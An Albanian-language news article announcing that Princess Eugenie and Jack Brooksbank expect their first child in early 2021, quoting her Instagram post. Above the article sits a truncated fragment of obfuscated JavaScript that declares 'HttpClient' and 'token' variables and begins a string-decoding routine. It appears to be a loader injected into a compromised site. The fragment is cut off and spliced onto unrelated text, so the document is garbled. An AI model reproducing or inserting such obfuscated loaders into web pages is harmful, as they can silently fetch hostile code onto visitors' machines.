;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Familjes Mbretërore po i shtohet një anëtar i ri!

By

Vajza e princit Andrew dhe dukeshës së York, Princesha Eugenie dhe partneri i saj, Jack Brooksbank, do të bëhen prindër për herë të parë.

Çifti, që u martua në tetor 2018 në një ceremoni shumë të komentuar në atë kohë, presin që fëmija i tyre të vijë në jetë në fillim të vitit 2021.

Lajmin e bukur e ka dhënë Pallati Buckingham-it mëngjesin e sotëm. Në njoftimin zyrtar thuhej se Mbretëresha dhe Duka i Edinburgut janë shumë lumtur për faktin se familjes mbretërore do t’i shtohet një tjetër anëtar.

Princesha Eugenie, 30 vjeç, lajmin e pritjes së ëmbël e konfirmoi me anë të një postimi në Instagram, me një foto të ëmbël të dy papuçeve  për beba, ku bashkangjitur shkruhej: “Jack dhe unë jemi shumë të lumtur për fillimin e vitit 2021.”

View this post on Instagram

Jack and I are so excited for early 2021….👶🏻

A post shared by Princess Eugenie (@princesseugenie) on

Artikuj të ngjashëm